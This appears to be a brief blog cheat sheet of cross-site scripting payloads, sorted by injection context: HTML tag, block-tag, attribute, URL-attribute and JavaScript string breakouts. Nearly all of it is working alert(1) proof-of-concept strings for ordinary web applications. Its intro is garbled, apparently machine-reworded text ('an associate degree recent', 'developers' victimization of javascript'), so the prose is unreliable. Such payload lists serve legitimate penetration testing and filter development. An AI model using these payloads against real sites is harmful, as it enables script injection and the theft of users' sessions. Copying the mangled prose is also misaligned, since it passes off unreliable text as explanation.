XSS Basics HTML JavaScript Context Injection
Intro
Cross-site scripting (XSS) is an associate degree recent but continuously relevant and dangerous style of attack that plagues most internet applications, be it older or fashionable ones. It depends on developers’ victimization of javascript to boost the expertise of end-users of their application, however, once the javascript isn’t properly handled it results in several attainable problems, and one in all of them is XSS. We will talk about how to do XSS Basics HTML & JavaScript context injection.
HTML Context – Simple Tag Injection
Use when input lands inside an attribute’s value of an HTML tag or outside tag except the
ones described in next case. Prepend a “–>” to payload if input lands in HTML comments.
<svg onload=alert(1)>
“><svg onload=alert(1)>
HTML Context – In Block Tag Injection
Use when input lands inside or between opening/closing of the following tags:
<title><style><script><textarea><noscript><pre><xmp> and <iframe> (</tag> is
accordingly).
</tag><svg onload=alert(1)>
“></tag><svg onload=alert(1)>
HTML Context – Inline Injection
Use when input lands inside an attribute’s value of an HTML tag but that tag can’t be
terminated by greater than sign (>).
“onmouseover=alert(1) //
“autofocus onfocus=alert(1) //
HTML Context – Source Injection
Use when input lands as a value of the following HTML tag attributes: href, src, data or
action (also formaction). Src attribute in script tags can be an URL or “data:,alert(1)”.
javascript:alert(1)
Javascript Context – Code Injection
Use when input lands in a script block, inside a string delimited value.
‘-alert(1)-‘
‘-alert(1)//
Javascript Context – Code Injection with Escape Bypass
Use when input lands in a script block, inside a string delimited value but quotes are
escaped by a backslash.
\’-alert(1)//
Javascript Context – Tag Injection
Use when input lands anywhere in a script block.
</script><svg onload=alert(1)>
We have discussed XSS Basics HTML & JavaScript context injection.